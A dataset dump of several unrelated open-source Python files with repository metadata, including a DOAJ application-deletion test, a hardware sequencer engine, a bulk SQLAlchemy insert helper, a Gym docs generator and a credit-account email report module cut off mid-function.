"Apache-2.0"
] | 14 | 2015-11-27T13:01:23.000Z | 2021-05-21T07:57:23.000Z | import time
from parameterized import parameterized
from portality import constants
from doajtest.fixtures import JournalFixtureFactory, AccountFixtureFactory, ApplicationFixtureFactory
from doajtest.helpers import DoajTestCase, load_from_matrix
from portality import lock
from portality.bll import DOAJ
from portality.bll import exceptions
from portality.models import Journal, Account, Suggestion
def load_parameter_sets():
return load_from_matrix("delete_application.csv", test_ids=[])
EXCEPTIONS = {
"ArgumentException" : exceptions.ArgumentException,
"Locked" : lock.Locked,
"AuthoriseException" : exceptions.AuthoriseException,
"NoSuchObjectException" : exceptions.NoSuchObjectException
}
def check_locks(application, cj, rj, account):
if account is None:
return
account_id = account.id
application_id = None
cj_id = None
rj_id = None
if application is not None: application_id = application.id
if cj is not None: cj_id = cj.id
if rj is not None: rj_id = rj.id
if application_id is not None:
assert not lock.has_lock(constants.LOCK_APPLICATION, application_id, account_id)
if cj_id is not None:
assert not lock.has_lock(constants.LOCK_JOURNAL, cj_id, account_id)
if rj_id is not None:
assert not lock.has_lock(constants.LOCK_JOURNAL, rj_id, account_id)
class TestBLLDeleteApplication(DoajTestCase):
def setUp(self):
super(TestBLLDeleteApplication, self).setUp()
self.old_journal_save = Journal.save
def tearDown(self):
super(TestBLLDeleteApplication, self).tearDown()
Journal.save = self.old_journal_save
@parameterized.expand(load_parameter_sets)
def test_01_delete_application(self, name, application_type, account_type, current_journal, related_journal, raises):
###############################################
## set up
# create the test application (if needed), and the associated current_journal and related_journal in suitable states
application = None
cj = None
rj = None
if application_type == "found" or application_type == "locked":
application = Suggestion(**ApplicationFixtureFactory.make_application_source())
if current_journal == "none":
application.remove_current_journal()
elif current_journal == "not_found":
application.set_current_journal("123456789987654321")
elif current_journal == "found":
cj = Journal(**JournalFixtureFactory.make_journal_source())
cj.set_id(cj.makeid())
cj.save(blocking=True)
application.set_current_journal(cj.id)
elif current_journal == "locked":
cj = Journal(**JournalFixtureFactory.make_journal_source())
cj.set_id(cj.makeid())
cj.save(blocking=True)
application.set_current_journal(cj.id)
lock.lock(constants.LOCK_JOURNAL, cj.id, "otheruser")
if related_journal == "none":
application.remove_related_journal()
elif related_journal == "not_found":
application.set_related_journal("123456789987654321")
elif related_journal == "found":
rj = Journal(**JournalFixtureFactory.make_journal_source())
rj.set_id(rj.makeid())
rj.save(blocking=True)
application.set_related_journal(rj.id)
elif related_journal == "locked":
rj = Journal(**JournalFixtureFactory.make_journal_source())
rj.set_id(rj.makeid())
rj.save(blocking=True)
application.set_related_journal(rj.id)
lock.lock(constants.LOCK_JOURNAL, rj.id, "otheruser")
acc = None
if account_type != "none":
acc = Account(**AccountFixtureFactory.make_publisher_source())
if account_type == "not_permitted":
acc.remove_role("publisher")
if application_type == "locked":
thelock = lock.lock(constants.LOCK_APPLICATION, application.id, "otheruser")
# we can't explicitly block on the lock, but we can halt until we confirm it is saved
thelock.blockall([(thelock.id, thelock.last_updated)])
application_id = None
if application is not None:
if acc is not None:
application.set_owner(acc.id)
else:
application.set_owner("randomuser")
application.save(blocking=True)
application_id = application.id
elif application_type == "not_found":
application_id = "sdjfasofwefkwflkajdfasjd"
###########################################################
# Execution
svc = DOAJ.applicationService()
if raises != "":
with self.assertRaises(EXCEPTIONS[raises]):
time.sleep(1)
svc.delete_application(application_id, acc)
time.sleep(1)
check_locks(application, cj, rj, acc)
else:
svc.delete_application(application_id, acc)
# we need to sleep, so the index catches up
time.sleep(1)
# check that no locks remain set for this user
check_locks(application, cj, rj, acc)
# check that the application actually is gone
if application is not None:
assert Suggestion.pull(application.id) is None
# check that the current journal no longer has a reference to the application
if cj is not None:
cj = Journal.pull(cj.id)
assert cj.current_application is None
# check that the related journal has a record that the application was deleted
if rj is not None:
rj = Journal.pull(rj.id)
record = rj.related_application_record(application.id)
assert "status" in record
assert record["status"] == "deleted"
| 39.574194 | 124 | 0.622595 | 666 | 6,134 | 5.561562 | 0.202703 | 0.049136 | 0.026728 | 0.036447 | 0.301296 | 0.263229 | 0.175486 | 0.160367 | 0.160367 | 0.160367 | 0 | 0.009316 | 0.282524 | 6,134 | 154 | 125 | 39.831169 | 0.832311 | 0.08135 | 0 | 0.25 | 0 | 0 | 0.054387 | 0.012146 | 0 | 0 | 0 | 0 | 0.068966 | 1 | 0.043103 | false | 0 | 0.077586 | 0.008621 | 0.146552 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d127c47da3786d5826c5e41959a0d6dd2107d434 | 10,139 | py | Python | psdaq/psdaq/pyxpm/pvseq.py | JBlaschke/lcls2 | 30523ef069e823535475d68fa283c6387bcf817b | [
"BSD-3-Clause-LBNL"
] | 16 | 2017-11-09T17:10:56.000Z | 2022-03-09T23:03:10.000Z | psdaq/psdaq/pyxpm/pvseq.py | JBlaschke/lcls2 | 30523ef069e823535475d68fa283c6387bcf817b | [
"BSD-3-Clause-LBNL"
] | 6 | 2017-12-12T19:30:05.000Z | 2020-07-09T00:28:33.000Z | psdaq/psdaq/pyxpm/pvseq.py | JBlaschke/lcls2 | 30523ef069e823535475d68fa283c6387bcf817b | [
"BSD-3-Clause-LBNL"
] | 25 | 2017-09-18T20:02:43.000Z | 2022-03-27T22:27:42.000Z | import time
from psdaq.cas.seq import *
from psdaq.pyxpm.pvhandler import *
from p4p.nt import NTScalar
from p4p.server.thread import SharedPV
verbose = True
NSubSeq = 64
def _nwords(instr):
return 1
class SeqCache(object):
def __init__(self, index, sz, instr):
self.index = index
self.size = sz
self.instr = instr
class Engine(object):
def __init__(self, id, reg):
self._id = id
self._reg = reg
self._jump = reg.find(name='SeqJump_%d'%id)[0]
self._ram = reg.find(name='SeqMem_%d'%id)[0].mem
self._caches = {} # instruction sequences committed to device
a = 0
self._caches[a] = SeqCache(0,3,[FixedRateSync(5,1),FixedRateSync(5,1),Branch.unconditional(line=0)])
self._ram [a ].set(FixedRateSync(5,1)._word())
self._ram [a+1].set(FixedRateSync(5,1)._word())
self._ram [a+2].set(Branch.unconditional(line=0)._word(a))
a = (1<<reg.seqAddrLen.get())-1
self._caches[a] = SeqCache(1,1,[Branch.unconditional(line=0)])
self._ram [a].set(Branch.unconditional(line=a)._word(a))
self._indices = 3 # bit mask of committed sequences
self._seq = [] # instruction sequence to be committed
def cacheSeq(self,val):
seq = []
try:
# Reconstitute the list of instructions
iiter = iter(val)
ninstr = next(iiter)
for i in range(ninstr):
nargs = next(iiter)
args = [ next(iiter) for i in range(6) ]
instr = args[0]
if instr == FixedRateSync.opcode:
seq.append(FixedRateSync(args[1],args[2]))
elif instr == ACRateSync.opcode:
seq.append(ACRateSync(args[1],args[2],args[3]))
elif instr == Branch.opcode:
if nargs == 1:
seq.append(Branch.unconditional(args[1]))
else:
seq.append(Branch.conditional(args[1],args[2],args[3]))
elif instr == CheckPoint.opcode:
seq.append(CheckPoint(0))
elif instr == ControlRequest.opcode:
seq.append(ControlRequest(args[1]))
except StopIteration:
pass
self._seq = seq
return len(seq)
def insertSeq(self):
rval = 0
aindex = -3
while True:
# Validate sequence (skip)
# Calculate memory needed
nwords = 0
for i in self._seq:
nwords = nwords + _nwords(i)
# Find memory range (just) large enough
best_ram = 0
if True:
addr = 0
none_found = 1<<self._reg.seqAddrLen.get()
best_size = none_found
for key,cache in self._caches.items():
isize = key-addr
if verbose:
print('Found memblock {:x}:{:x} [{:x}]'.format(addr,key,isize))
if isize==nwords:
best_size = isize
best_ram = addr
break
elif isize > nwords and isize < best_size:
best_size = isize
best_ram = addr
addr = key+cache.size
if best_size == none_found:
print('BRAM space unavailable')
rval = -1
break
if verbose:
print('Using memblock {:x}:{:x} [{:x}]'.format(best_ram,best_ram+nwords,nwords))
if rval:
break
if self._indices == -1:
rval = -2
break
for i in range(NSubSeq):
if (self._indices & (1<<i))==0:
self._indices = self._indices | (1<<i)
aindex = i
break
print('Caching seq {} of size {}'.format(aindex,nwords))
self._caches[best_ram] = SeqCache(aindex,nwords,self._seq)
# Translate addresses
addr = best_ram
for i in self._seq:
if i.opcode == Branch.opcode:
jumpto = i.address()
if jumpto > len(self._seq):
rval = -3
elif jumpto >= 0:
jaddr = 0
for j,seq in enumerate(self._seq):
if j==jumpto:
break
jaddr += _nwords(seq)
self._ram[addr].set(i._word(jaddr+best_ram))
addr += 1
else:
self._ram[addr].set(i._word())
addr += 1
print('Translated addresses rval = {}'.format(rval))
if rval:
self.removeSeq(aindex)
break
if rval==0:
rval = aindex
return rval
def removeSeq(self, index):
if (self._indices & (1<<index))==0:
return -1
self._indices = self._indices & ~(1<<index)
# Lookup sequence
ram = self._reg.SeqMem_0.mem
for key,seq in self._caches.items():
if seq.index == index:
self._ram[key].set(key)
del self._caches[key]
return 0
return -2
def setAddress(self, seq, start, sync):
a = -1
for key,entry in self._caches.items():
if entry.index == seq:
a = key
for i in range(start):
a += _nwords(entry.instr)
break
if a>=0:
self._jump.setManStart(a,0)
self._jump.setManSync (sync)
print('sequence started at address 0x{:x}'.format(a))
else:
print('sequence {} failed to start'.format(seq))
def enable(self,e):
v = self._reg.seqEn.get()
if e:
v = v | (1<<self._id)
else:
v = v & ~(1<<self._id)
self._reg.seqEn.set(v)
def reset(self):
v = 1<<self._id
self._reg.seqRestart.set(v)
def dump(self):
v = self._jump.reg[15].get()
print('Sync [{:04x}] Start [{:04x}] Enable [{:08x}]'.format(v>>16,v&0xffff,self._reg.seqEn.get()))
state = self._reg.find(name='SeqState_%d'%self._id)[0]
cond = state.find(name='cntCond')
print("Req {:08x} Inv {:08x} Addr {:08x} Cond {:02x}{:02x}{:02x}{:02x}"
.format(state.find(name='cntReq') [0].get(),
state.find(name='cntInv') [0].get(),
state.find(name='currAddr') [0].get(),
cond[0].get(),
cond[1].get(),
cond[2].get(),
cond[3].get()))
for i in range(NSubSeq):
if (self._indices & (1<<i)):
print('Sequence %d'%i)
self.dumpSequence(i)
def dumpSequence(self,i):
for key,entry in self._caches.items():
if entry.index == i:
for j in range(entry.size):
print('[{:08x}] {:08x}'.format(key+j,self._ram[key+j].get()))
class PVSeq(object):
def __init__(self, provider, name, ip, engine):
self._eng = engine
self._seq = []
def addPV(label,ctype='I',init=0):
pv = SharedPV(initial=NTScalar(ctype).wrap(init),
handler=DefaultPVHandler())
provider.add(name+':'+label,pv)
return pv
self._pv_DescInstrs = addPV('DESCINSTRS','s','')
self._pv_InstrCnt = addPV('INSTRCNT')
self._pv_SeqIdx = addPV('SEQIDX' ,'aI',[0]*NSubSeq)
self._pv_SeqDesc = addPV('SEQDESC' ,'as',['']*NSubSeq)
self._pv_Seq00Idx = addPV('SEQ00IDX')
self._pv_Seq00Desc = addPV('SEQ00DESC' ,'s','')
self._pv_Seq00BDesc = addPV('SEQ00BDESC','as',['']*NSubSeq)
self._pv_RmvIdx = addPV('RMVIDX')
self._pv_RunIdx = addPV('RUNIDX')
self._pv_Running = addPV('RUNNING')
def addPV(label,ctype,init,cmd):
pv = SharedPV(initial=NTScalar(ctype).wrap(init),
handler=PVHandler(cmd))
provider.add(name+':'+label,pv)
return pv
self._pv_Instrs = addPV('INSTRS' ,'aI',[0]*16384, self.instrs)
self._pv_RmvSeq = addPV('RMVSEQ' , 'I', 0, self.rmvseq)
self._pv_Ins = addPV('INS' , 'I', 0, self.ins)
self._pv_SchedReset = addPV('SCHEDRESET', 'I', 0, self.schedReset)
self._pv_ForceReset = addPV('FORCERESET', 'I', 0, self.forceReset)
def instrs(self, pv, val):
pvUpdate(self._pv_InstrCnt,self._eng.cacheSeq(val))
def rmvseq(self, pv, pval):
val = self._pv_RmvIdx.current()['value']
print('rmvseq index %d'%val)
if val > 1 and val < NSubSeq:
self._eng.removeSeq(val)
pvUpdate(self._pv_Seq00Idx,0)
def ins(self, pv, val):
if val:
rval = self._eng.insertSeq()
pvUpdate(self._pv_Seq00Idx,rval)
def schedReset(self, pv, val):
if val:
idx = self._pv_RunIdx.current()['value']
print('Scheduling index {}',idx)
pvUpdate(self._pv_Running,1 if idx>1 else 0)
self._eng.enable(True)
self._eng.setAddress(idx,0,1)
self._eng.reset()
def forceReset(self, pv, val):
if val:
idx = self._pv_RunIdx.current()['value']
print('Starting index {}',idx)
pvUpdate(self._pv_Running,1 if idx>1 else 0)
self._eng.enable(True)
self._eng.setAddress(idx,0,0)
self._eng.reset()
def checkPoint(self,addr):
pvUpdate(self._pv_Running,0)
| 35.826855 | 134 | 0.483578 | 1,139 | 10,139 | 4.171203 | 0.187006 | 0.036624 | 0.00884 | 0.011577 | 0.226058 | 0.187539 | 0.154704 | 0.154704 | 0.11366 | 0.083351 | 0 | 0.024733 | 0.389881 | 10,139 | 282 | 135 | 35.953901 | 0.743291 | 0.026926 | 0 | 0.196653 | 0 | 0.004184 | 0.05997 | 0.002435 | 0 | 0 | 0.000609 | 0 | 0 | 1 | 0.083682 | false | 0.004184 | 0.020921 | 0.004184 | 0.150628 | 0.058577 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d12b265e15613a5740be8a1120b2616b639c765d | 2,345 | py | Python | bulky/functions/insert.py | tgrx/bulky | 8c5a41936b8ea29ed39b57ebe1a91bd85e64422d | [
"Apache-2.0"
] | null | null | null | bulky/functions/insert.py | tgrx/bulky | 8c5a41936b8ea29ed39b57ebe1a91bd85e64422d | [
"Apache-2.0"
] | 4 | 2020-03-24T17:19:39.000Z | 2021-06-01T23:47:33.000Z | bulky/functions/insert.py | tgrx/bulky | 8c5a41936b8ea29ed39b57ebe1a91bd85e64422d | [
"Apache-2.0"
] | null | null | null | from typing import Optional
import sqlalchemy as sa
from typeguard import typechecked
from bulky import consts
from bulky.internals import utils
from bulky.types import (
ReturningType,
RowsType,
SessionType,
TableType,
ValuesSeriesType,
)
@typechecked(always=True)
def insert(
session: SessionType,
table_or_model: TableType,
values_series: ValuesSeriesType,
returning: Optional[ReturningType] = None,
) -> RowsType:
"""
Inserts a series of values into DB.
Data are split into chunks.
Chunks are inserted sequentially.
No multiprocessing.
No multithreading.
No async IO.
The order of data elements is not preserved.
The order of returned rows is undefined.
Session is not flushed.
Inserted objects are not propagated to session.
Values are not validated against database type.
Default values on SqlAlchemy level are resolved and populated implicitly.
:param session: session from SqlAlchemy
:param table_or_model: a Table or Mapper or class inherited from declarative_base() call
:param values_series: a sequence of values in {column: value} format.
`column` may be:
* a name of a table column;
* a column attribute of a table / Mapper / Declarative;
:param returning: a sequence of elements representing table / Mapper / Declarative columns.
These columns, bound with values, will be returned after insert.
:return: a list of RowProxy.
If either no data are inserted or no returning requested, empty list will be returned.
"""
result: RowsType = []
if not values_series:
return result
table = utils.get_table(table_or_model)
returning_cleaned = utils.clean_returning(table, returning)
values_series_cleaned = utils.clean_values(table, values_series)
values_series_chunks = (
values_series_cleaned[i : i + consts.BULK_CHUNK_SIZE]
for i in range(0, len(values_series_cleaned), consts.BULK_CHUNK_SIZE)
)
for n_chunk, chunk in enumerate(values_series_chunks):
query = sa.insert(table, values=chunk, returning=returning_cleaned, inline=True)
query_result = session.execute(query)
if returning:
data = query_result.fetchall()
result.extend(data)
return result
| 28.597561 | 95 | 0.704904 | 296 | 2,345 | 5.472973 | 0.405405 | 0.066667 | 0.022222 | 0.023457 | 0.02716 | 0 | 0 | 0 | 0 | 0 | 0 | 0.000557 | 0.234968 | 2,345 | 81 | 96 | 28.950617 | 0.902453 | 0.44307 | 0 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.027778 | false | 0 | 0.166667 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d12ec155ae9ab0387d7e7cd3e2162068051e9976 | 3,357 | py | Python | docs/scripts/gen_mds.py | RushivArora/gym-docs | 7c9714204fa680af0b07b4f19cd01726007595f4 | [
"MIT"
] | null | null | null | docs/scripts/gen_mds.py | RushivArora/gym-docs | 7c9714204fa680af0b07b4f19cd01726007595f4 | [
"MIT"
] | null | null | null | docs/scripts/gen_mds.py | RushivArora/gym-docs | 7c9714204fa680af0b07b4f19cd01726007595f4 | [
"MIT"
] | null | null | null | __author__ = "Sander Schulhoff"
__email__ = "sanderschulhoff@gmail.com"
from pydoc import doc
import gym
import os
from os import mkdir, path
import re
import numpy as np
from utils import trim
from utils import kill_strs
from tqdm import tqdm
LAYOUT = "env"
pattern = re.compile(r'(?<!^)(?=[A-Z])')
gym.logger.set_level(gym.logger.DISABLED)
for env_spec in tqdm(gym.envs.registry.all()):
if any(x in str(env_spec.id) for x in kill_strs):
continue
try:
env = gym.make(env_spec.id)
split = str(type(env.unwrapped)).split(".")
env_type = split[2]
if env_type == 'atari' or env_type == 'unittest':
continue
# variants dont get their own pages
e_n = str(env_spec).lower()
docstring = env.unwrapped.__doc__
if not docstring:
docstring = env.unwrapped.__class__.__doc__
docstring = trim(docstring)
# pascal case
pascal_env_name = env_spec.id.split("-")[0]
snake_env_name = pattern.sub('_', pascal_env_name).lower()
title_env_name = snake_env_name.replace("_", " ").title()
env_type_title = env_type.replace("_", " ").title()
# path for saving video
v_path = os.path.join(os.path.dirname(__file__), "..", "source", "environments", env_type, snake_env_name + ".md")
front_matter = f"""---
AUTOGENERATED: DO NOT EDIT FILE DIRECTLY
title: {title_env_name}
---
"""
title = f"# {title_env_name}"
gif = "```{figure}" + f" ../../_static/videos/{env_type}/{snake_env_name}.gif" + f" \n:width: 200px\n:name: {snake_env_name}\n```"
info = f"This environment is part of the <a href='..'>{env_type_title} environments</a>. Please read that page first for general information."
env_table = f"| | |\n|---|---|\n"
env_table += f"| Action Space | {env.action_space} |\n"
if env.observation_space.shape:
env_table += f"| Observation Shape | {env.observation_space.shape} |\n"
if hasattr(env.observation_space, "high"):
high = env.observation_space.high
if hasattr(high, "shape"):
if len(high.shape) == 3:
high = high[0][0][0]
high = np.round(high, 2)
high = str(high).replace("\n", " ")
env_table += f"| Observation High | {high} |\n"
if hasattr(env.observation_space, "low"):
low = env.observation_space.low
if hasattr(low, "shape"):
if len(low.shape) == 3:
low = low[0][0][0]
low = np.round(low, 2)
low = str(low).replace("\n", " ")
env_table += f"| Observation Low | {low} |\n"
else:
env_table += f"| Observation Space | {env.observation_space} |\n"
env_table += f"| Import | `gym.make(\"{env_spec.id}\")` | \n"
if docstring is None:
docstring = "No information provided"
all_text = f"""{front_matter}
{title}
{gif}
{info}
{env_table}
{docstring}
"""
file = open(v_path, "w", encoding="utf-8")
file.write(all_text)
file.close()
except Exception as e:
print(e)
| 31.083333 | 150 | 0.548406 | 419 | 3,357 | 4.178998 | 0.331742 | 0.039977 | 0.035979 | 0.022844 | 0.105083 | 0.065106 | 0 | 0 | 0 | 0 | 0 | 0.006891 | 0.308311 | 3,357 | 107 | 151 | 31.373832 | 0.747201 | 0.019958 | 0 | 0.051282 | 0 | 0.012821 | 0.244979 | 0.053561 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.128205 | 0 | 0.128205 | 0.012821 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
d12eebaeb7581a5a1c21063a28bdfc7ae9b1cb5d | 13,247 | py | Python | cas_admin/email_utils.py | path-cc/credit-account-reporting | 7a4f3e6ce81ad7e11b567c48294eb1ad5f68697e | [
"MIT"
] | null | null | null | cas_admin/email_utils.py | path-cc/credit-account-reporting | 7a4f3e6ce81ad7e11b567c48294eb1ad5f68697e | [
"MIT"
] | null | null | null | cas_admin/email_utils.py | path-cc/credit-account-reporting | 7a4f3e6ce81ad7e11b567c48294eb1ad5f68697e | [
"MIT"
] | 1 | 2022-03-02T21:14:59.000Z | 2022-03-02T21:14:59.000Z | import click
import xlsxwriter
import json
import smtplib
import dns.resolver
from operator import itemgetter
from collections import OrderedDict
from datetime import timedelta
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders
from pathlib import Path
from cas_admin.account import get_account_data, get_charge_data
def send_email(
from_addr,
to_addrs=[],
subject="",
replyto_addr=None,
cc_addrs=[],
bcc_addrs=[],
attachments=[],
html="",
):
if len(to_addrs) == 0:
click.echo("No recipients in the To: field, not sending email", err=True)
return
msg = MIMEMultipart()
msg["From"] = from_addr
msg["To"] = ", ".join(to_addrs)
if len(cc_addrs) > 0:
msg["Cc"] = ", ".join(cc_addrs)
if len(bcc_addrs) > 0:
msg["Bcc"] = ", ".join(bcc_addrs)
if replyto_addr is not None:
msg["Reply-To"] = replyto_addr
msg["Subject"] = subject
msg.attach(MIMEText(html, "html"))
for attachment in attachments:
path = Path(attachment)
part = MIMEBase("application", "octet-stream")
with path.open("rb") as f:
part.set_payload(f.read())
encoders.encode_base64(part)
part.add_header("Content-Disposition", "attachment", filename=path.name)
msg.attach(part)
for recipient in to_addrs + cc_addrs + bcc_addrs:
domain = recipient.split("@")[1]
sent = False
result = None
for mx in dns.resolver.query(domain, "MX"):
mailserver = str(mx).split()[1][:-1]
try:
smtp = smtplib.SMTP(mailserver)
result = smtp.sendmail(from_addr, recipient, msg.as_string())
smtp.quit()
except Exception:
click.echo(
f"WARNING: Could not send to {recipient} using {mailserver}",
err=True,
)
if result is not None:
click.echo(
f"WARNING: Got result: {result} from {mailserver}", err=True
)
else:
sent = True
if sent:
break
else:
click.echo(
f"ERROR: Could not send to {recipient} using any mailserver", err=True
)
def generate_weekly_accounts_report(
es_client,
starting_week_date,
xlsx_directory=Path("./weekly_accounts_reports"),
index="cas-credit-accounts",
):
"""Return HTML and XSLX report of per-account credits used and remaining"""
columns = OrderedDict()
columns["account_id"] = "Account Name"
columns["type"] = "Account Type"
columns["owner"] = "Account Owner"
columns["percent_credits_used"] = "% Credits Used"
columns["total_credits"] = "Total Credits"
columns["total_charges"] = "Total Charges"
columns["remaining_credits"] = "Remaining Credits"
date_str = str(starting_week_date)
xlsx_directory.mkdir(parents=True, exist_ok=True)
xlsx_file = xlsx_directory / f"cas-weekly-account-report_{date_str}.xlsx"
html = """<html>
<head>
</head>
<body style="background-color: white">
<table style="border-collapse: collapse">
"""
workbook = xlsxwriter.Workbook(str(xlsx_file))
worksheet = workbook.add_worksheet()
xlsx_header_fmt = workbook.add_format({"text_wrap": True, "align": "center"})
xlsx_date_fmt = workbook.add_format({"num_format": "yyyy-mm-dd"})
xlsx_numeric_fmt = workbook.add_format({"num_format": "#,##0"})
xlsx_percent_fmt = workbook.add_format({"num_format": "#,##0.00%"})
def row_style(i):
if i % 2 == 1:
return "background-color: #ddd"
return "background-color: white"
def col_html(x):
try:
x = float(x)
return f"""<td style="text-align: right; border: 1px solid black">{x:,.1f}</td>"""
except ValueError:
return f"""<td style="text-align: left; border: 1px solid black">{x}</td>"""
# Write header
i_row = 0
html += f"""<tr style="{row_style(0)}">\n"""
for i_col, (column_id, column_name) in enumerate(columns.items()):
html += f"""<th style="text-align: center; border: 1px solid black">{column_name}</th>"""
worksheet.write(i_row, i_col, column_name, xlsx_header_fmt)
html += "</tr>\n"
# Get row data
addl_cols = ["percent_credits_used", "remaining_credits"]
rows = get_account_data(es_client, addl_cols=addl_cols, index=index)
# Add row data to html and xlsx
for i_row, row in enumerate(rows, start=1):
html += f"""<tr style="{row_style(i_row)}">\n"""
for i_col, col in enumerate(columns):
val = row[col]
if col == "percent_credits_used":
html += f"""<td style="text-align: right; border: 1px solid black">{val:.1%}</td>"""
worksheet.write(i_row, i_col, val, xlsx_percent_fmt)
else:
html += col_html(val)
try:
worksheet.write(i_row, i_col, float(val), xlsx_numeric_fmt)
except ValueError:
worksheet.write(i_row, i_col, val)
html += "</tr>\n"
html += """</table>
</body>
</html>
"""
workbook.close()
return {"html": html, "xlsx_file": xlsx_file}
def generate_weekly_account_owner_report(
es_client,
account,
starting_week_date,
xlsx_directory=Path("./weekly_account_reports_by_account"),
snapshot_directory=Path("./weekly_accounts_snapshots"),
account_index="cas-credit-accounts",
charge_index="cas-daily-charge-records-*",
):
"""Return HTML and XSLX report of per-account credits used and remaining"""
# Set up global report stuff
date_str = str(starting_week_date)
xlsx_directory = xlsx_directory / account
xlsx_directory.mkdir(parents=True, exist_ok=True)
xlsx_file = xlsx_directory / f"cas-weekly-account-report_{date_str}.xlsx"
html = """<html>
<head>
</head>
<body style="background-color: white">
"""
workbook = xlsxwriter.Workbook(str(xlsx_file))
xlsx_header_fmt = workbook.add_format({"text_wrap": True, "align": "center"})
xlsx_date_fmt = workbook.add_format({"num_format": "yyyy-mm-dd"})
xlsx_numeric_fmt = workbook.add_format({"num_format": "#,##0.0"})
xlsx_percent_fmt = workbook.add_format({"num_format": "#,##0.0%"})
xlsx_delta_fmt = workbook.add_format({"num_format": "+#,##0.0;-#,##0.0;0"})
def row_style(i):
if i % 2 == 1:
return "background-color: #ddd"
return "background-color: white"
def col_style(x):
try:
x = float(x)
return f"""<td style="text-align: right; border: 1px solid black; padding: 4px">{x:,.1f}</td>"""
except ValueError:
return f"""<td style="text-align: left; border: 1px solid black; padding: 4px">{x}</td>"""
# First create the account report
account_columns = OrderedDict()
account_columns["account_id"] = "Account Name"
account_columns["type"] = "Account Type"
account_columns["percent_credits_used"] = "% Credits Used"
account_columns["total_credits"] = "Total Credits"
account_columns["total_charges"] = "Total Charges"
account_columns["remaining_credits"] = "Remaining Credits"
account_columns["owner"] = "Account Owner"
account_columns["owner_email"] = "Account Owner Email"
account_worksheet = workbook.add_worksheet("Account summary")
html += """<h1>Account summary</h1>
<table style="border-collapse: collapse">\n"""
# Write header
i_row = 0
html += f"""<tr>\n"""
for i_col, (column_id, column_name) in enumerate(account_columns.items()):
html += f"""<th style="text-align: center; border: 1px solid black; padding: 4px">{column_name}</th>"""
account_worksheet.write(i_row, i_col, column_name, xlsx_header_fmt)
html += "</tr>\n"
# Get row data
addl_cols = ["percent_credits_used", "remaining_credits"]
rows = get_account_data(
es_client, account=account, addl_cols=addl_cols, index=account_index
)
if len(rows) == 0:
raise ValueError(f"No account {account} found in index {index}.")
if len(rows) > 1:
raise ValueError(
f"Multiple accounts found for account id {account} in index {index}."
)
row = rows[0]
# Write this week's snapshot file
snapshot_directory = snapshot_directory / account
snapshot_directory.mkdir(parents=True, exist_ok=True)
snapshot_file = snapshot_directory / f"cas-weekly-account-report_{date_str}.json"
with open(snapshot_file, "w") as f:
json.dump(row, f, indent=2)
# Add row data to html and xlsx
i_row = 1
html += """<tr>\n"""
for i_col, col in enumerate(account_columns):
val = row[col]
if col == "percent_credits_used":
html += f"""<td style="text-align: right; border: 1px solid black; padding: 4px">{val:.1%}</td>"""
account_worksheet.write(i_row, i_col, val, xlsx_percent_fmt)
else:
html += col_style(val)
try:
account_worksheet.write(i_row, i_col, float(val), xlsx_numeric_fmt)
except ValueError:
account_worksheet.write(i_row, i_col, val)
html += """</tr>\n"""
# Read from snapshot if available
last_date_str = str(starting_week_date - timedelta(days=7))
last_snapshot_file = (
snapshot_directory / f"cas-weekly-account-report_{last_date_str}.json"
)
if last_snapshot_file.exists():
with last_snapshot_file.open() as f:
last_row = json.load(f)
# Add row data to html and xlsx
i_row = 2
html += """<tr>\n"""
merge_to_col = list(account_columns.keys()).index("total_credits")
for i_col, col in enumerate(account_columns):
if not (i_col == 0 or col in {"total_credits", "total_charges"}):
if i_col > merge_to_col:
html += """<td style="border-style: none"></td>"""
elif i_col == 0:
val = "Change since last report"
html += f"""<td style="text-align: left; border-style: none; padding: 4px" colspan="{merge_to_col}">{val}</td>"""
account_worksheet.write(i_row, i_col, val)
account_worksheet.merge_range(i_row, i_col, i_row, merge_to_col)
else:
val = row[col] - last_row[col]
html += f"""<td style="text-align: right; border: 1px solid black; padding: 4px">{val:+,.1f}</td>"""
account_worksheet.write(i_row, i_col, val, xlsx_delta_fmt)
html += """</tr>\n"""
html += """</table>\n"""
# Now create the charges report
charge_columns = OrderedDict()
charge_columns["date"] = "Date"
charge_columns["user_id"] = "User"
charge_columns["resource_name"] = "Resource"
charge_columns["total_charges"] = "Charges"
charges_worksheet = workbook.add_worksheet("Charges summary")
html += """<h1>Last week's charges</h1>
<table style="border-collapse: collapse">\n"""
# Write header
i_row = 0
html += f"""<tr>\n"""
for i_col, (column_id, column_name) in enumerate(charge_columns.items()):
html += f"""<th style="text-align: center; border: 1px solid black; padding: 4px">{column_name}</th>"""
charges_worksheet.write(i_row, i_col, column_name, xlsx_header_fmt)
html += """</tr>\n"""
# Get row data
rows = get_charge_data(
es_client,
start_date=starting_week_date,
end_date=starting_week_date + timedelta(days=7),
account=account,
index=charge_index,
)
rows.sort(key=itemgetter("date", "user_id", "resource_name"))
# Add row data to html and xlsx
for i_row, row in enumerate(rows, start=1):
html += f"""<tr style="{row_style(i_row)}">\n"""
for i_col, col in enumerate(charge_columns):
val = row[col]
html += col_style(val)
try:
